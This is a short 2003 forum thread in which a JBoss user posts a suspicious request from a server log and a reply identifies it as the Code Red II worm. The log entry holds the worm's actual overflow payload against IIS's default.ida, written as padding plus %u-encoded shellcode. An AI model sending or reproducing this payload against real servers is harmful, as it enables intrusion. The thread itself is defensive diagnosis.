1 Reply Latest reply on Mar 12, 2003 2:40 PM by darryl_staflund

Stack Crack?

torsi Mar 11, 2003 3:24 AM

I got the "you do not exists, go away" message. I then started to look around the only suspicious item i found
was this in the jboss request logfile.

I see many of these come through looking for a windows
based webserver but this one looks like it could have
been intended for jboss on linux.

-Tom-

202.42.48.41 - - [09/Mar/2003:00:05:55 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN\
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN\
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801\
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 1137 "-\
" "-"

1. Re: Stack Crack?

darryl_staflund Mar 12, 2003 2:40 PM (in response to torsi)

I believe this is the Code Red II virus. The following describes it in some detail.

http://www.thesitewizard.com/news/coderediiworm.shtml

Darryl
Actions